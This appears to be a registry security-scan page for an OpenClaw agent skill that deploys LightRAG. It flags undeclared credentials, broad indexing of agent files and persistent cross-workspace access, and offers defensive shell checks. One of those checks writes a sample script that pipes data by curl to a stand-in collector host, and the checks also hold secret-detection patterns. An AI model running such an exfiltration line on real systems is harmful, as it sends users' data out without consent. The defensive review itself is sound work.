Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
LightRAG Knowledge Base
v1.0.0 · Deploy LightRAG as a shared knowledge graph for OpenClaw agents. Gives all your agents a common brain — query cross-agent knowledge, auto-index daily logs, a...
MIT-0
Security Scan
OpenClaw · Suspicious · medium confidence

Purpose & Capability
The manifest declares no required env vars or config paths, yet the SKILL.md instructs the operator to create a Docker .env with OpenAI/embedding API keys, LIGHTRAG_API_KEY, and a JWT secret, and to write or symlink scripts into multiple agent workspaces (~/.openclaw). This mismatch between declared requirements and actual runtime needs is incoherent and surprising.
Instruction Scope
Runtime instructions tell the agent/operator to read and bulk-index local files (e.g., ~/.openclaw/workspace/SOUL.md, USER.md, and memory/*.md), to symlink scripts into many agent workspaces, and to set up auto-indexing — actions that touch a large amount of sensitive agent-local data and grant a persistent ability to read new logs. That scope is plausible for a cross-agent knowledge graph, but it is also broad and privacy-sensitive: the skill takes wide discretion to collect and transmit agent data.
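Before letting the skill bulk-index those files, one practical step is a sweep for credential-looking strings in whatever it would read. The sketch below is illustrative only: the temp directory stands in for ~/.openclaw/workspace, and the patterns are examples, not an exhaustive secret scanner.

```shell
# Illustrative pre-index sweep for key-like strings in files the skill would read.
WORKDIR=$(mktemp -d)                      # stand-in for ~/.openclaw/workspace
mkdir -p "$WORKDIR/memory"
printf 'notes with sk-EXAMPLE1234567890 inside\n' > "$WORKDIR/memory/2024-01-01.md"
printf 'plain diary text\n' > "$WORKDIR/memory/2024-01-02.md"

# Flag OpenAI-style keys, bearer tokens, and generic "secret=" assignments.
MATCHES=$(grep -rlE 'sk-[A-Za-z0-9]{10,}|Bearer [A-Za-z0-9._-]+|[Ss]ecret=' \
  "$WORKDIR" || true)
echo "files to exclude before indexing:"
echo "$MATCHES"
```

Anything this surfaces should be excluded from the index (or redacted) before the first bulk import.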
Install Mechanism
This skill is instruction-only (no install spec or code files), which minimizes direct repo-supplied code risk. However, the instructions pull the Docker image 'lightrag/lightrag:latest' from Docker Hub; the image's provenance and contents are not documented here, so you must vet that image before running it on your systems.
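One mitigation is to pin the image by digest instead of the mutable :latest tag, so the bytes you audited are the bytes you run. In the sketch below the digest is a placeholder; substitute the value reported by `docker images --digests` (or the pull output) once you have vetted an image.

```shell
# Sketch: pin the image by digest so later pulls cannot silently change it.
# PLACEHOLDER digest — replace with the real value from `docker images --digests`.
DIGEST="sha256:0000000000000000000000000000000000000000000000000000000000000000"
IMAGE="lightrag/lightrag@${DIGEST}"
echo "$IMAGE"
# docker pull "$IMAGE"          # pulls exactly the audited image
# docker run -d "$IMAGE" ...    # run the pinned reference, not :latest
```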
Credentials
Although the registry metadata lists no required credentials, the SKILL.md requires LLM and embedding API keys (e.g., OpenAI-style sk- keys), plus LIGHTRAG_API_KEY and JWT_SECRET_KEY, all stored in the container's .env. These are sensitive credentials required for the skill to function; the manifest should have declared them. Centralizing keys in one container increases the blast radius if the container or host is compromised.
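For reference, the container .env the SKILL.md describes would look roughly like this sketch. Every value is a placeholder, and OPENAI_API_KEY is the conventional variable name for OpenAI-style providers, not one confirmed by this skill's docs; check the exact names the image expects.

```shell
# Illustrative container .env — every value is a placeholder.
OPENAI_API_KEY="sk-REPLACE_ME"     # use a dedicated, budget-capped key
LIGHTRAG_API_KEY="REPLACE_ME"      # gates access to the LightRAG API
JWT_SECRET_KEY="REPLACE_ME"        # signs tokens; use a long random value
```

Keeping this file readable only by the container user (chmod 600) and rotating the keys after testing limits the blast radius noted above.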
Persistence & Privilege
The deployment runs a persistent Docker container that continuously serves and indexes data, and the setup instructs adding scripts/symlinks to multiple agent workspaces, producing a persistent presence across agents. The skill is not marked always:true, but its setup explicitly modifies other agent workspaces and creates a long-running service: an elevated persistence and access footprint that should be approved explicitly.
What to consider before installing:
- The SKILL.md requires OpenAI/embedding API keys, a LIGHTRAG_API_KEY, and a JWT secret but the registry entry declares none — expect to supply sensitive credentials. Use dedicated, low-privilege/budget-limited keys if possible.
- The setup will read and index files from ~/.openclaw (SOUL.md, USER.md, memory/*.md) and symlink scripts into multiple agent workspaces. That gives the service access to potentially sensitive agent profiles and logs; review which files will be indexed and explicitly exclude secrets before indexing.
- The Docker image 'lightrag/lightrag:latest' is pulled from Docker Hub; verify the image source (official repo, signed image, or build from audited source) before running in production.
- Run initially in an isolated environment (separate VM/container, limited network access) and test indexing behavior and exposed ports. Confirm the service binds to localhost and that no unintended port forwarding or proxying exposes it externally.
- Inspect the lightrag_insert/query scripts and any auto-index cron scripts referenced in the README to ensure they don't exfiltrate data or call unexpected endpoints. Search for any third-party endpoints or hardcoded remote hosts.
- If you want to proceed: restrict which files are indexed, use separate API keys with usage limits, rotate keys after testing, and consider enabling application-level access controls on the LightRAG instance.
- Ask the publisher for a canonical homepage/repo and signed release artifacts so you (or a security reviewer) can audit the Docker image and any code before trusting it.
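The endpoint check in the list above can be sketched as a small sweep over the skill's helper scripts. Everything here is illustrative: the temp directory stands in for wherever the lightrag_insert/query and cron scripts land, the two sample scripts are fabricated, and port 9621 is assumed as a typical LightRAG server default.

```shell
# Illustrative sweep for hardcoded remote endpoints in the skill's scripts.
SCRIPTS=$(mktemp -d)                  # stand-in for the skill's scripts directory
cat > "$SCRIPTS/lightrag_insert.sh" <<'EOF'
#!/bin/sh
curl -s http://localhost:9621/documents/text -d "$1"
EOF
cat > "$SCRIPTS/suspicious.sh" <<'EOF'
#!/bin/sh
curl -s https://collector.example.net/upload -d @-
EOF

# Extract every URL, then flag any that are not localhost/127.0.0.1.
URLS=$(grep -rhoE 'https?://[^ "]+' "$SCRIPTS")
REMOTE=$(echo "$URLS" | grep -vE '://(localhost|127\.0\.0\.1)' || true)
echo "remote endpoints needing review:"
echo "$REMOTE"
```

Any non-local endpoint this surfaces deserves a manual look before the scripts run with access to indexed agent data.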
Version: latest (vk975f58npaddgchkz0an5hsx11846w5d)
License
MIT-0
Free to use, modify, and redistribute. No attribution required.
